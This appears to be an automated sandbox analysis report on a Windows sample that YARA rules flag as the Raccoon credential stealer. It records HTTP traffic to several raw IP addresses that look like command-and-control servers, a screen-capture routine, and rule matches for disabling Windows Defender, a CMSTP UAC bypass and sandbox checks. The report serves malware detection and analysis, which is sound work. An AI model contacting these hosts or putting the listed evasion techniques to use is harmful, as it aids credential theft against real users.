              Source: unknownHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 159.223.25.220
              Source: global trafficHTTP traffic detected: GET /hdm3prapor HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 188.166.1.115
              Source: global trafficHTTP traffic detected: GET /hdm3prapor HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 188.166.1.115
              Source: global trafficHTTP traffic detected: GET /hdm3prapor HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 194.180.174.147
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeCode function: 2_2_0042B173 __EH_prolog,GdiplusStartup,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,_mbstowcs,GdipSaveImageToFile,DeleteObject,GdiplusShutdown,2_2_0042B173

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 2.2.LaunchWinApp.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.qpwx2wT5ky.exe.468cf00.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.LaunchWinApp.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.qpwx2wT5ky.exe.468cf00.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.LaunchWinApp.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.318536230.0000000004271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.308435428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.308711684.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.309062654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.308140277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.320185486.000000000468C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.467738406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.309415722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.467293779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: qpwx2wT5ky.exe PID: 6428, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: LaunchWinApp.exe PID: 5980, type: MEMORYSTR

              System Summary

              barindex
              Source: 0.3.qpwx2wT5ky.exe.46615d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: 0.3.qpwx2wT5ky.exe.46615d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
              Source: 0.3.qpwx2wT5ky.exe.46615d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
              Source: 0.3.qpwx2wT5ky.exe.46615d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
              Source: 2.2.LaunchWinApp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 2.0.LaunchWinApp.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 2.0.LaunchWinApp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 2.0.LaunchWinApp.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 0.2.qpwx2wT5ky.exe.31bbfc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: 0.2.qpwx2wT5ky.exe.31bbfc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
              Source: 0.2.qpwx2wT5ky.exe.31bbfc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
              Source: 0.2.qpwx2wT5ky.exe.31bbfc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
              Source: 0.2.qpwx2wT5ky.exe.3170000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: 0.2.qpwx2wT5ky.exe.3170000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
              Source: 0.2.qpwx2wT5ky.exe.3170000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
              Source: 0.2.qpwx2wT5ky.exe.3170000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
              Source: 2.0.LaunchWinApp.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 0.2.qpwx2wT5ky.exe.468cf00.3.raw.unpack, type: UNPACKEDPEMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 2.0.LaunchWinApp.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 2.2.LaunchWinApp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 2.0.LaunchWinApp.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 2.0.LaunchWinApp.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 2.0.LaunchWinApp.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 2.0.LaunchWinApp.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 2.0.LaunchWinApp.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 2.0.LaunchWinApp.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 0.3.qpwx2wT5ky.exe.45615b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: 0.3.qpwx2wT5ky.exe.45615b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
              Source: 0.3.qpwx2wT5ky.exe.45615b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
              Source: 0.3.qpwx2wT5ky.exe.45615b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
              Source: 0.3.qpwx2wT5ky.exe.4615610.3.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: 0.3.qpwx2wT5ky.exe.4615610.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
              Source: 0.3.qpwx2wT5ky.exe.4615610.3.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
              Source: 0.3.qpwx2wT5ky.exe.4615610.3.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
              Source: 2.0.LaunchWinApp.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 0.2.qpwx2wT5ky.exe.468cf00.3.unpack, type: UNPACKEDPEMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 0.2.qpwx2wT5ky.exe.3170000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: 0.2.qpwx2wT5ky.exe.3170000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
              Source: 0.2.qpwx2wT5ky.exe.3170000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
              Source: 0.2.qpwx2wT5ky.exe.3170000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
              Source: 2.0.LaunchWinApp.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 2.0.LaunchWinApp.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 2.0.LaunchWinApp.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 2.0.LaunchWinApp.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 0.3.qpwx2wT5ky.exe.4615610.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: 0.3.qpwx2wT5ky.exe.4615610.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
              Source: 0.3.qpwx2wT5ky.exe.4615610.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
              Source: 0.3.qpwx2wT5ky.exe.4615610.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
              Source: 00000002.00000000.308435428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 00000002.00000000.308711684.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 00000002.00000000.309062654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 00000002.00000000.308140277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 00000000.00000002.317108118.0000000003170000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: 00000000.00000002.317108118.0000000003170000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
              Source: 00000000.00000002.317108118.0000000003170000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
              Source: 00000000.00000002.317108118.0000000003170000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
              Source: 00000002.00000000.467738406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 00000002.00000000.309415722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: 00000002.00000000.467293779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Raccoon stealer payload Author: ditekSHen
              Source: qpwx2wT5ky.exe, OuCPJ4q0f2/D5GjPfY8gl.csLarge array initialization: h6MujDbFZc: array initializer size 917520
              Source: qpwx2wT5ky.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: 0.3.qpwx2wT5ky.exe.46615d0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: 0.3.qpwx2wT5ky.exe.46615d0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
              Source: 0.3.qpwx2wT5ky.exe.46615d0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 0.3.qpwx2wT5ky.exe.46615d0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
              Source: 2.2.LaunchWinApp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 2.0.LaunchWinApp.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 2.0.LaunchWinApp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 2.0.LaunchWinApp.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 0.2.qpwx2wT5ky.exe.31bbfc0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: 0.2.qpwx2wT5ky.exe.31bbfc0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
              Source: 0.2.qpwx2wT5ky.exe.31bbfc0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 0.2.qpwx2wT5ky.exe.31bbfc0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
              Source: 0.2.qpwx2wT5ky.exe.3170000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: 0.2.qpwx2wT5ky.exe.3170000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
              Source: 0.2.qpwx2wT5ky.exe.3170000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 0.2.qpwx2wT5ky.exe.3170000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
              Source: 2.0.LaunchWinApp.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 0.2.qpwx2wT5ky.exe.468cf00.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 2.0.LaunchWinApp.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 2.2.LaunchWinApp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 2.0.LaunchWinApp.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 2.0.LaunchWinApp.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 2.0.LaunchWinApp.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 2.0.LaunchWinApp.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 2.0.LaunchWinApp.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 2.0.LaunchWinApp.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 0.3.qpwx2wT5ky.exe.45615b0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: 0.3.qpwx2wT5ky.exe.45615b0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
              Source: 0.3.qpwx2wT5ky.exe.45615b0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 0.3.qpwx2wT5ky.exe.45615b0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
              Source: 0.3.qpwx2wT5ky.exe.4615610.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: 0.3.qpwx2wT5ky.exe.4615610.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
              Source: 0.3.qpwx2wT5ky.exe.4615610.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 0.3.qpwx2wT5ky.exe.4615610.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
              Source: 2.0.LaunchWinApp.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 0.2.qpwx2wT5ky.exe.468cf00.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 0.2.qpwx2wT5ky.exe.3170000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: 0.2.qpwx2wT5ky.exe.3170000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
              Source: 0.2.qpwx2wT5ky.exe.3170000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 0.2.qpwx2wT5ky.exe.3170000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
              Source: 2.0.LaunchWinApp.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 2.0.LaunchWinApp.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 2.0.LaunchWinApp.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 2.0.LaunchWinApp.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 0.3.qpwx2wT5ky.exe.4615610.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: 0.3.qpwx2wT5ky.exe.4615610.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
              Source: 0.3.qpwx2wT5ky.exe.4615610.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 0.3.qpwx2wT5ky.exe.4615610.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
              Source: 00000002.00000000.308435428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 00000002.00000000.308711684.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 00000002.00000000.309062654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 00000002.00000000.308140277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 00000000.00000002.317108118.0000000003170000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: 00000000.00000002.317108118.0000000003170000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
              Source: 00000000.00000002.317108118.0000000003170000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 00000000.00000002.317108118.0000000003170000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
              Source: 00000002.00000000.467738406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 00000002.00000000.309415722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: 00000002.00000000.467293779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Raccoon author = ditekSHen, description = Raccoon stealer payload
              Source: C:\Windows\SysWOW64\LaunchWinApp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5980 -s 796
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_017720B00_2_017720B0
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_0177B5480_2_0177B548
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_017797A80_2_017797A8
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_0177784B0_2_0177784B
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_01775FA80_2_01775FA8
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_0177F1600_2_0177F160
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_0177F1200_2_0177F120
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_0177F1FC0_2_0177F1FC
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_0177F1BA0_2_0177F1BA
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_0177F1A20_2_0177F1A2
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_0177F0F10_2_0177F0F1
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_0177B53F0_2_0177B53F
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_0177B5380_2_0177B538
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_0177F5120_2_0177F512
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_0177F9710_2_0177F971
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_0177F9390_2_0177F939
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_0177F9A00_2_0177F9A0
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_06AA52800_2_06AA5280
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_06AAB2400_2_06AAB240
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_06AA5E100_2_06AA5E10
              Source: C:\Users\user\Desktop\qpwx2wT5ky.exeCode function: 0_2_06AA0D900_2_06AA0D90
